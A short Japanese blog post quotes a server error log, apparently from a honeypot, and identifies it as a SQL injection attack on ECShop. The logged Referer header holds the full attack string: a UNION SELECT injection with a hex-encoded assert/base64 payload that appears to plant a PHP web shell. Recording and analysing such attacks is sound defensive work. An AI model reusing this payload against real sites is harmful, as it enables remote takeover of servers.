ECShopに対するSQLインジェクション

ECShopに対するSQLインジェクション

エラーログを確認したところ

[Thu Mar 07 22:35:33 2019] [error] [client 119.27.182.4] 
script '///user.php' not found or unable to stat,
referer: 554fcae493e564ee0dc75bdf2ebf94caads|
a:2:{s:3:"num";s:448:"/
union select 1,0x272f2a,3,4,5,6,7,8,0x7B24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A326C745957646C633178316347787659575263526D6C735A567870626D526C654335776148416E4C43647364574E68637A772F634768774943527249443069613273694F325A31626D4E3061573975494774724B4352724B58746C646D46734B4352724B547439514774724B435266554539545646736962484D6958536B37507A346E4B513D3D2729293B2F2F7D787878,10-- -";s:2:"id";s:3:"'/
";}

どうやらECShopに対するSQLインジェクションです
詳細はハニーポット観察記録(47)「ECShop に対する SQL インジェクション攻撃」に参考してください。

发表评论

邮箱地址不会被公开。 必填项已用*标注